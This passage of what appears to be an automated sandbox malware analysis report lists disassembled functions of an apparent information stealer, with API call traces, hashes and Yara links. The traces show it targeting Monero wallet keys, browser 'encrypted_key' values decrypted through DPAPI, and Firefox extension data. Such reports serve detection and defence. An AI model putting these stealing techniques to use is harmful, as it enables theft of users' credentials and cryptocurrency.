                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: fcc2742c9f15f8dcccfb09575ff7690bf222eb2479b9e6509b748654155f1c42
                        • Instruction ID: 9e869d8588138d838c1cecb154a1d7d70a688549bbdf3be58e4ee17da878637a
                        • Opcode Fuzzy Hash: fcc2742c9f15f8dcccfb09575ff7690bf222eb2479b9e6509b748654155f1c42
                        • Instruction Fuzzy Hash: 16916172A11149DBDB15FBA0DD94EEE7338AF24210F504169E587B7098EF386A4ECB70
                        Function 0100D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100D801
                        • lstrlen.KERNEL32(00000000), ref: 0100D99F
                        • lstrlen.KERNEL32(00000000), ref: 0100D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0100DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: faf33eadd07fa2c7de5da9acc4111c9b802a3db1cf6b177b88d3fbe3d9697486
                        • Instruction ID: fffb86c01519c48965ed783eba2c3c9c81a7777fb96f21ba6d40f5d22ba7a45f
                        • Opcode Fuzzy Hash: faf33eadd07fa2c7de5da9acc4111c9b802a3db1cf6b177b88d3fbe3d9697486
                        • Instruction Fuzzy Hash: 89813276A51149DBDB15FBA4DD94EEE7339BF24210F404129F487A7098EF386A0ACB70
                        Function 0100F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,01021580,01020D92), ref: 0100F54C
                        • lstrlen.KERNEL32(00000000), ref: 0100F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: ca02497909e243b497a39fa7a26a51103d164a1eb9e0b4ac98ab5a582e2bcdaf
                        • Instruction ID: 0a962add7d40b147380244dfa03b06bf73a6aa75936d2162ceead752828e1a6e
                        • Opcode Fuzzy Hash: ca02497909e243b497a39fa7a26a51103d164a1eb9e0b4ac98ab5a582e2bcdaf
                        • Instruction Fuzzy Hash: 15514275E0114AEBDB04FBB4DD94DED7379AF64210F408528E847A7194EE386B0ECBA0
                        Function 01013560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 193dabab86f1aba60ce379931717561cfddd1c7ad0d0e9eafe2c197044007b59
                        • Instruction ID: 6f0e678a163b6b0f140ae0aa74d580ed2cd3a55c3f882a9d6c6af626efc2ecdd
                        • Opcode Fuzzy Hash: 193dabab86f1aba60ce379931717561cfddd1c7ad0d0e9eafe2c197044007b59
                        • Instruction Fuzzy Hash: CB4130B5E10209EBDB04EFA5D845AEEB7B8BF58314F008418E4567B248DB79A605CFA1
                        Function 01009CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 01009D39
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                          • Part of subcall function 01009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                          • Part of subcall function 01009AC0: LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                          • Part of subcall function 01009B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01009B84
                          • Part of subcall function 01009B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 01009BA3
                          • Part of subcall function 01009B60: LocalFree.KERNEL32(?), ref: 01009BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 35d71de8036078ac218ff0fc0c8c26fb9a90030a6a56c73bbd31ca7c6f0dbaff
                        • Instruction ID: 664cf9461820a0c5899ac02b4eaffe7ce169b083065e72c375e8114b2583d936
                        • Opcode Fuzzy Hash: 35d71de8036078ac218ff0fc0c8c26fb9a90030a6a56c73bbd31ca7c6f0dbaff
                        • Instruction Fuzzy Hash: 4A3181B5D0010DABEF05EFE8DC85AEFB7B8BF48304F144559EA55A7281E7349A04CBA1
                        Function 01018680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010205B7), ref: 010186CA
                        • Process32First.KERNEL32(?,00000128), ref: 010186DE
                        • Process32Next.KERNEL32(?,00000128), ref: 010186F3
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • CloseHandle.KERNEL32(?), ref: 01018761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 71a415d4f392409b74aeb1a84e8da3103b5c22ec59efe527e25df2584e4a92f5
                        • Instruction ID: a67608152f42ada780e1cd62c491cdc3009f59583382fd51468b218350e5047a
                        • Opcode Fuzzy Hash: 71a415d4f392409b74aeb1a84e8da3103b5c22ec59efe527e25df2584e4a92f5
                        • Instruction Fuzzy Hash: E4316B71A02259EBCB24EF55DC44FEEB778FB54710F004199E50AA7198DB386B45CFA0
                        Function 01017980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01020E00,00000000,?), ref: 010179B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010179B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,01020E00,00000000,?), ref: 010179C4
                        • wsprintfA.USER32 ref: 010179F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 275ddb44922dc98fd834d95e80e9b887b986ea5addd27c62808f293c08ddd9c6
                        • Instruction ID: b86148425e3e98c99c0206352b1f723a01599148b88b7e4a81a5e1ad0176d796
                        • Opcode Fuzzy Hash: 275ddb44922dc98fd834d95e80e9b887b986ea5addd27c62808f293c08ddd9c6
                        • Instruction Fuzzy Hash: EC113CB2944118ABDB14DFC9E949BBEB7F8FB4CB11F00421AF606A2284D3795940CBB0
                        Function 010192E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(01013AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,01013AEE,?), ref: 010192FC
                        • GetFileSizeEx.KERNEL32(000000FF,01013AEE), ref: 01019319
                        • CloseHandle.KERNEL32(000000FF), ref: 01019327
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: e5b3340aa195a55045f5bc8507a3767110e9dc443ed6141577896a3e9fff2beb
                        • Instruction ID: e06e9dcce608b4a4f0eda0e60641af7010201b4a40a2ff762fb28660dd9dff1d
                        • Opcode Fuzzy Hash: e5b3340aa195a55045f5bc8507a3767110e9dc443ed6141577896a3e9fff2beb
                        • Instruction Fuzzy Hash: 52F04439E40204BBDB24DFB4EC59F9E77F9AB48710F10C154B552A72C4D67496018B40
                        Function 0101C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 0101C74E
                          • Part of subcall function 0101BF9F: __amsg_exit.LIBCMT ref: 0101BFAF
                        • __getptd.LIBCMT ref: 0101C765
                        • __amsg_exit.LIBCMT ref: 0101C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0101C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 1ab3dba2439071e73d138ae1f32ea3aa70c77b57e53edd80e7ed969c9cd28d47
                        • Instruction ID: da97d48406935c5f202cd96f7571c4fb1c602a5a7e344db3ad0f155758b93d69
                        • Opcode Fuzzy Hash: 1ab3dba2439071e73d138ae1f32ea3aa70c77b57e53edd80e7ed969c9cd28d47
                        • Instruction Fuzzy Hash: 00F0CD32A806129BE731BBB8550578D33A07F10724F20414CE0C4AB1C8CBAC98408B45
                        Function 01014F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014F7A
                        • lstrcat.KERNEL32(?,01021070), ref: 01014F97
                        • lstrcat.KERNEL32(?,01898F98), ref: 01014FAB
                        • lstrcat.KERNEL32(?,01021074), ref: 01014FBD
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 0101492C
                          • Part of subcall function 01014910: FindFirstFileA.KERNEL32(?,?), ref: 01014943
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                          • Part of subcall function 01014910: FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                          • Part of subcall function 01014910: FindClose.KERNEL32(000000FF), ref: 01014B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
